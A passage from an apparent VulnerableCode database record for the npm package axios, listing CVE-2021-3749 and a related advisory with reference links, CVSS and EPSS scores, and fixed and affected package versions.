url https://access.redhat.com/errata/RHSA-2026:6174
31
reference_url https://access.redhat.com/errata/RHSA-2026:6192
reference_id RHSA-2026:6192
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:6192
32
reference_url https://access.redhat.com/errata/RHSA-2026:6277
reference_id RHSA-2026:6277
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:6277
33
reference_url https://access.redhat.com/errata/RHSA-2026:6308
reference_id RHSA-2026:6308
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:6308
34
reference_url https://access.redhat.com/errata/RHSA-2026:6309
reference_id RHSA-2026:6309
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:6309
35
reference_url https://access.redhat.com/errata/RHSA-2026:6404
reference_id RHSA-2026:6404
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:6404
36
reference_url https://access.redhat.com/errata/RHSA-2026:6428
reference_id RHSA-2026:6428
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:6428
37
reference_url https://access.redhat.com/errata/RHSA-2026:6497
reference_id RHSA-2026:6497
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:6497
38
reference_url https://access.redhat.com/errata/RHSA-2026:6567
reference_id RHSA-2026:6567
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:6567
39
reference_url https://access.redhat.com/errata/RHSA-2026:6568
reference_id RHSA-2026:6568
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:6568
40
reference_url https://access.redhat.com/errata/RHSA-2026:6802
reference_id RHSA-2026:6802
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:6802
41
reference_url https://access.redhat.com/errata/RHSA-2026:7249
reference_id RHSA-2026:7249
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:7249
42
reference_url https://access.redhat.com/errata/RHSA-2026:8218
reference_id RHSA-2026:8218
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8218
43
reference_url https://access.redhat.com/errata/RHSA-2026:8229
reference_id RHSA-2026:8229
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8229
fixed_packages
0
url pkg:npm/axios@0.30.3
purl pkg:npm/axios@0.30.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.30.3
1
url pkg:npm/axios@1.0.0-alpha.1
purl pkg:npm/axios@1.0.0-alpha.1
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.0.0-alpha.1
2
url pkg:npm/axios@1.13.5
purl pkg:npm/axios@1.13.5
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.13.5
aliases CVE-2026-25639, GHSA-43fc-jf86-j433
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-x41s-g5mh-pkdq
Fixing_vulnerabilities
0
url VCID-n89f-3nkb-ebg3
vulnerability_id VCID-n89f-3nkb-ebg3
summary 
Incorrect Comparison
axios is vulnerable to Inefficient Regular Expression Complexity
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3749.json
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3749.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2021-3749
reference_id
reference_type
scores
0
value 0.08262
scoring_system epss
scoring_elements 0.92246
published_at 2026-04-16T12:55:00Z
1
value 0.08262
scoring_system epss
scoring_elements 0.92234
published_at 2026-04-13T12:55:00Z
2
value 0.08262
scoring_system epss
scoring_elements 0.92237
published_at 2026-04-12T12:55:00Z
3
value 0.08262
scoring_system epss
scoring_elements 0.92231
published_at 2026-04-09T12:55:00Z
4
value 0.08262
scoring_system epss
scoring_elements 0.922
published_at 2026-04-01T12:55:00Z
5
value 0.08262
scoring_system epss
scoring_elements 0.92228
published_at 2026-04-08T12:55:00Z
6
value 0.08262
scoring_system epss
scoring_elements 0.92216
published_at 2026-04-07T12:55:00Z
7
value 0.08262
scoring_system epss
scoring_elements 0.92213
published_at 2026-04-04T12:55:00Z
8
value 0.08262
scoring_system epss
scoring_elements 0.92207
published_at 2026-04-02T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2021-3749
2
reference_url https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf
3
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3749
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3749
4
reference_url https://github.com/axios/axios
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios
5
reference_url https://github.com/axios/axios/commit/5b457116e31db0e88fede6c428e969e87f290929
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios/commit/5b457116e31db0e88fede6c428e969e87f290929
6
reference_url https://huntr.dev/bounties/1e8f07fc-c384-4ff9-8498-0690de2e8c31
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://huntr.dev/bounties/1e8f07fc-c384-4ff9-8498-0690de2e8c31
7
reference_url https://lists.apache.org/thread.html/r075d464dce95cd13c03ff9384658edcccd5ab2983b82bfc72b62bb10@%3Ccommits.druid.apache.org%3E
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r075d464dce95cd13c03ff9384658edcccd5ab2983b82bfc72b62bb10@%3Ccommits.druid.apache.org%3E
8
reference_url https://lists.apache.org/thread.html/r216f0fd0a3833856d6a6a1fada488cadba45f447d87010024328ccf2@%3Ccommits.druid.apache.org%3E
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r216f0fd0a3833856d6a6a1fada488cadba45f447d87010024328ccf2@%3Ccommits.druid.apache.org%3E
9
reference_url https://lists.apache.org/thread.html/r3ae6d2654f92c5851bdb73b35e96b0e4e3da39f28ac7a1b15ae3aab8@%3Ccommits.druid.apache.org%3E
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r3ae6d2654f92c5851bdb73b35e96b0e4e3da39f28ac7a1b15ae3aab8@%3Ccommits.druid.apache.org%3E
10
reference_url https://lists.apache.org/thread.html/r4bf1b32983f50be00f9752214c1b53738b621be1c2b0dbd68c7f2391@%3Ccommits.druid.apache.org%3E
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r4bf1b32983f50be00f9752214c1b53738b621be1c2b0dbd68c7f2391@%3Ccommits.druid.apache.org%3E
11
reference_url https://lists.apache.org/thread.html/r7324ecc35b8027a51cb6ed629490fcd3b2d7cf01c424746ed5744bf1@%3Ccommits.druid.apache.org%3E
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r7324ecc35b8027a51cb6ed629490fcd3b2d7cf01c424746ed5744bf1@%3Ccommits.druid.apache.org%3E
12
reference_url https://lists.apache.org/thread.html/r74d0b359408fff31f87445261f0ee13bdfcac7d66f6b8e846face321@%3Ccommits.druid.apache.org%3E
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r74d0b359408fff31f87445261f0ee13bdfcac7d66f6b8e846face321@%3Ccommits.druid.apache.org%3E
13
reference_url https://lists.apache.org/thread.html/ra15d63c54dc6474b29f72ae4324bcb03038758545b3ab800845de7a1@%3Ccommits.druid.apache.org%3E
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/ra15d63c54dc6474b29f72ae4324bcb03038758545b3ab800845de7a1@%3Ccommits.druid.apache.org%3E
14
reference_url https://lists.apache.org/thread.html/rc263bfc5b53afcb7e849605478d73f5556eb0c00d1f912084e407289@%3Ccommits.druid.apache.org%3E
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rc263bfc5b53afcb7e849605478d73f5556eb0c00d1f912084e407289@%3Ccommits.druid.apache.org%3E
15
reference_url https://lists.apache.org/thread.html/rfa094029c959da0f7c8cd7dc9c4e59d21b03457bf0cedf6c93e1bb0a@%3Cdev.druid.apache.org%3E
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rfa094029c959da0f7c8cd7dc9c4e59d21b03457bf0cedf6c93e1bb0a@%3Cdev.druid.apache.org%3E
16
reference_url https://lists.apache.org/thread.html/rfc5c478053ff808671aef170f3d9fc9d05cc1fab8fb64431edc66103@%3Ccommits.druid.apache.org%3E
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rfc5c478053ff808671aef170f3d9fc9d05cc1fab8fb64431edc66103@%3Ccommits.druid.apache.org%3E
17
reference_url https://www.npmjs.com/package/axios
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.npmjs.com/package/axios
18
reference_url https://www.oracle.com/security-alerts/cpujul2022.html
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpujul2022.html
19
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1999784
reference_id 1999784
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1999784
20
reference_url https://nvd.nist.gov/vuln/detail/CVE-2021-3749
reference_id CVE-2021-3749
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2021-3749
21
reference_url https://github.com/advisories/GHSA-cph5-m8f7-6c5x
reference_id GHSA-cph5-m8f7-6c5x
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-cph5-m8f7-6c5x
22
reference_url https://access.redhat.com/errata/RHSA-2021:3694
reference_id RHSA-2021:3694
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:3694
23
reference_url https://access.redhat.com/errata/RHSA-2021:4902
reference_id RHSA-2021:4902
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:4902
24
reference_url https://access.redhat.com/errata/RHSA-2022:0056
reference_id RHSA-2022:0056
reference_type
scores
url https://access.redhat.com/errata/RHSA-2022:0056
25
reference_url https://access.redhat.com/errata/RHSA-2022:1276
reference_id RHSA-2022:1276
reference_type
scores
url https://access.redhat.com/errata/RHSA-2022:1276
fixed_packages
0
url pkg:npm/axios@0.21.2
purl pkg:npm/axios@0.21.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-7rdk-mw2k-eqdx
1
vulnerability VCID-hq6f-86aj-8yav
2
vulnerability VCID-x41s-g5mh-pkdq
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.21.2
aliases CVE-2021-3749, GHSA-cph5-m8f7-6c5x
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-n89f-3nkb-ebg3
Risk_score4.0
Resource_urlhttp://public2.vulnerablecode.io/packages/pkg:npm/axios@0.21.2